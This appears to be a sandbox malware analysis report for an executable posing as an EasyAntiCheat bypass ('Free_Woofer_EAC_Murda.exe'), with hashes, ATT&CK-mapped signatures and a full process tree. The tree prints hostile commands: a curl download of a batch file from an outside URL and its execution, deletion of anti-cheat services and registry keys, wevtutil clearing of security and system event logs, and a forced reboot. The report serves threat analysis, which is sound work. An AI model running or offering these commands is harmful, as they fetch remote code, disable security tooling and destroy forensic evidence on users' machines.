cb5f3040eb80e8f0a2a546efe839af7f342e0ec3e2325f424a89cc9e0792965a

Analysis

max time kernel
28s
max time network
28s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 15:48

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Free_Woofer_EAC_Murda.exe
Size

23KB
MD5

132b2818f0ac641643299cace90deea6
SHA1

3fd71f59522ea07f6f4c395a6c66efb1cd37d03a
SHA256

cb5f3040eb80e8f0a2a546efe839af7f342e0ec3e2325f424a89cc9e0792965a
SHA512

da35ce0ea328c03d8e17316da4433d29e0cedcf8ac43acd06d9a65dd7d20dbae391a15608145f6f3a8492d980cea3b90745b0648527730eddf752d1ae2db4a7d
SSDEEP

384:6s3Velp5c0XezK/p00VTbw49Ixpl7DWhXInFZqtFiqxM1L3VJ:Re3DsNabwvvWhC1L3VJ

Score

9^/10

defense_evasion persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Clears Windows event logs 1 TTPs 3 IoCs

defense_evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
3664	wevtutil.exe
1136	wevtutil.exe
3356	wevtutil.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2396	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3684	ipconfig.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1964	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "71"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeSecurityPrivilege	3664	wevtutil.exe
Token: SeBackupPrivilege	3664	wevtutil.exe
Token: SeSecurityPrivilege	1136	wevtutil.exe
Token: SeBackupPrivilege	1136	wevtutil.exe
Token: SeSecurityPrivilege	3356	wevtutil.exe
Token: SeBackupPrivilege	3356	wevtutil.exe
Token: SeShutdownPrivilege	1656	shutdown.exe
Token: SeRemoteShutdownPrivilege	1656	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2876	LogonUI.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 1548 wrote to memory of 2276	1548	Free_Woofer_EAC_Murda.exe	89
PID 1548 wrote to memory of 2276	1548	Free_Woofer_EAC_Murda.exe	89
PID 1548 wrote to memory of 1472	1548	Free_Woofer_EAC_Murda.exe	98
PID 1548 wrote to memory of 1472	1548	Free_Woofer_EAC_Murda.exe	98
PID 1548 wrote to memory of 2320	1548	Free_Woofer_EAC_Murda.exe	103
PID 1548 wrote to memory of 2320	1548	Free_Woofer_EAC_Murda.exe	103
PID 1548 wrote to memory of 4952	1548	Free_Woofer_EAC_Murda.exe	104
PID 1548 wrote to memory of 4952	1548	Free_Woofer_EAC_Murda.exe	104
PID 4952 wrote to memory of 6076	4952	cmd.exe	105
PID 4952 wrote to memory of 6076	4952	cmd.exe	105
PID 1548 wrote to memory of 2176	1548	Free_Woofer_EAC_Murda.exe	106
PID 1548 wrote to memory of 2176	1548	Free_Woofer_EAC_Murda.exe	106
PID 2176 wrote to memory of 2156	2176	cmd.exe	107
PID 2176 wrote to memory of 2156	2176	cmd.exe	107
PID 2156 wrote to memory of 5696	2156	cmd.exe	109
PID 2156 wrote to memory of 5696	2156	cmd.exe	109
PID 5696 wrote to memory of 6120	5696	net.exe	110
PID 5696 wrote to memory of 6120	5696	net.exe	110
PID 2156 wrote to memory of 1964	2156	cmd.exe	111
PID 2156 wrote to memory of 1964	2156	cmd.exe	111
PID 2156 wrote to memory of 5320	2156	cmd.exe	112
PID 2156 wrote to memory of 5320	2156	cmd.exe	112
PID 2156 wrote to memory of 5592	2156	cmd.exe	113
PID 2156 wrote to memory of 5592	2156	cmd.exe	113
PID 2156 wrote to memory of 2792	2156	cmd.exe	114
PID 2156 wrote to memory of 2792	2156	cmd.exe	114
PID 2156 wrote to memory of 4280	2156	cmd.exe	115
PID 2156 wrote to memory of 4280	2156	cmd.exe	115
PID 2156 wrote to memory of 3664	2156	cmd.exe	116
PID 2156 wrote to memory of 3664	2156	cmd.exe	116
PID 2156 wrote to memory of 1136	2156	cmd.exe	117
PID 2156 wrote to memory of 1136	2156	cmd.exe	117
PID 2156 wrote to memory of 3356	2156	cmd.exe	118
PID 2156 wrote to memory of 3356	2156	cmd.exe	118
PID 2156 wrote to memory of 3684	2156	cmd.exe	119
PID 2156 wrote to memory of 3684	2156	cmd.exe	119
PID 2156 wrote to memory of 2420	2156	cmd.exe	120
PID 2156 wrote to memory of 2420	2156	cmd.exe	120
PID 2156 wrote to memory of 1556	2156	cmd.exe	121
PID 2156 wrote to memory of 1556	2156	cmd.exe	121
PID 2156 wrote to memory of 2396	2156	cmd.exe	122
PID 2156 wrote to memory of 2396	2156	cmd.exe	122
PID 2156 wrote to memory of 1656	2156	cmd.exe	123
PID 2156 wrote to memory of 1656	2156	cmd.exe	123

C:\Users\Admin\AppData\Local\Temp\Free_Woofer_EAC_Murda.exe
"C:\Users\Admin\AppData\Local\Temp\Free_Woofer_EAC_Murda.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\hsvs
  2⤵
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o C:\hsvs\EAC_Cleaner.bat https://crabwalkin.github.io/fatblackcock/EAC_Cleaner.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\system32\curl.exe
    curl -o C:\hsvs\EAC_Cleaner.bat https://crabwalkin.github.io/fatblackcock/EAC_Cleaner.bat
    3⤵
    PID:6076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\hsvs\EAC_Cleaner.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\hsvs\EAC_Cleaner.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\system32\net.exe
      net stop EasyAntiCheat /y
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop EasyAntiCheat /y
        5⤵
        
        PID:6120
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM EasyAntiCheat.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1964
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\EasyAntiCheat" /f
      4⤵
      PID:5320
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EAC" /f
      4⤵
      PID:5592
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EAC" /f
      4⤵
      PID:2792
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\EasyAntiCheat" /f
      4⤵
      PID:4280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl "Microsoft-Windows-Security-Auditing"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3664
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl "Microsoft-Windows-Eventlog"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1136
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl "System"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3356
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:3684
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2420
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:1556
  - - C:\Windows\system32\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:2396
  - - C:\Windows\system32\shutdown.exe
      shutdown /r /f /t 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1656

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3903055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\hsvs\EAC_Cleaner.bat

Filesize
1KB

MD5
0d3ad8fb5d23c9a62d4506d1d144dddf

SHA1
a78a6a1601bc4bd186308d19b2993a710b700fe5

SHA256
32e477f130ae5eb39ac893c59aef3ddd68a690b24c77c5b144942c3e22591984

SHA512
9d4ad0bef581c951bf34bc7197a43986663757f307fd123b69e1e304144a2e80a255cdb044200d757767fcb773ce654e7f74466a9950e695afaf346da84bdaaf

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads